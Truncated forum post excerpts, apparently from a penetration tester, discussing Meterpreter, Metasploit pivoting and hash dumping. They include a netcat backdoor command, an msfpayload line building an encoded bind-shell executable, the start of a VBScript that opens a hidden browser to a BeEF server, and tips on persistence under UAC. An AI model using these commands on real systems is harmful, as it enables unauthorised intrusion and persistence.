Thanks for the kind words, I'm glad you liked my script. I will posting later today my slide deck from my part of thepresentation with HD and JR on Meterpreter where I covered Meterpreter Scripting I...

did you needed to reboot for the UAC disable to take effect or did it work with out the rebbot?

vista has protections as well as windows 2008, you have to be system to be able to dump the hashes, you can do this by either using an exploit that gives you system or use schtasks to schedule a...

Meterpreter is a great payload for launching attacks but it does has its limitations like:

Single Thread
Does not currently have a sys proxy capability - So no Nmap scanning thru the pivot...

sorry it has been a long time since I logged in to the forum

http://www.darkoperator.com/tools-and-scripts/

Try this

http://darkoperator.blogspot.com/2009/04/dns-recon-tool-written-in-ruby.html

Hey bro

No problem with that, Metasploit is more for a full book if you want to cover it and it is always changing, I had the same idea about showing only the hash extraction, if you need any help...

yes the code should be updated, now in MSF3 if you want to know what DB driver is active you issue the db_driver command, if you want to change to another supported driver do db_driver and its name...

great work and the thing I love the most is in the hydra section, you covered using a single thread and not 30 or 40 like I have seen in other tutorials, I have seen routers being DoS by inexperience...

could you please post the steps that you used, my understanding was that in meterpreter the route command was for the pivoting of exploits that had the support to be channeled thru the meterpreter...

niceeeeeeee!!! never seen this one before, it is along the lines of using the inguardians tool and sc but in less steps.

netcat is a true backdoor, it has to be the most flexible tool there is, I would suggest cryptcat for pentest, but then again rarely in a pentest the ROE let us place backdoor because we add risk to...

netsh is a windows command to configure network settings not a linux command, I would recommend that you first get a Netcat backdoor working since it is the simplest. nc -L -d -p <backdoor port of...

it will portforward any remote port to a local port through the Meterpreter channel, useful for when wanting to connect to the targets RDP or Telnet.
good example:...

to make a beef backdoor first do the following, we create a vbscript that will launch a hidden iexplorer pointed to our beef server:


echo CreateObject("Wscript.Shell").Run "iexplore.exe -new...

some notes:

for backdoors use bind shells since they will open the port and just listen.
you have to open the port in the local firewall is it is enabled
if your target is behind a firewall...

if UAC is enabled this is going to be a hard one to make, you can place it in the programs startup folder. schtasks should let you schedule as the user the same as AT.

Thanks, sadly the portfwrd command in meterpreter in version 3.2 is broken you might try to get a copy of 3.0 and test on it and also on 3.1 with reverse shell since it fails on the bind shell since...

why not use Metasploit it self? create a payload with msfpayload something like this:


/msfpayload windows/meterpreter/bind_tcp LPORT=8080 R | ./msfencode -c 2 -t exe -o 345532.exe


then...

use the passivex payload, it will set the payload as an activex on IE and use it's configured proxy to make the connection back to the attacking host. Natron is working on improving it to work better...

The only way to achive what you want you will have to upload scanline and use it to scan from the compromised host.
meterpreter currently does not have that capability

Bro it is to all of us!!, I think hard and long before I send a Meterpreter Script for commitment in to MSF3 and release some of my tools since I know the use that some kid or who knows who is going...

Chaemelion, wine can emulate only a subset of the win32 API and not all other windows components do to the Complexity and requirements it can not be ran on wine. I may suggest you install virtualbox...

as you can see in the quote I did mention procesexplorer :p

I'm more of a command shell guy my self, pstools also has tools for looking at the dll's loaded and can be scripted to run against...

you know that some of this tools are for uploading to a target host line nc.exe, pulist, fgdump ... among others, but nice work either way on the ones that need to be in the menu.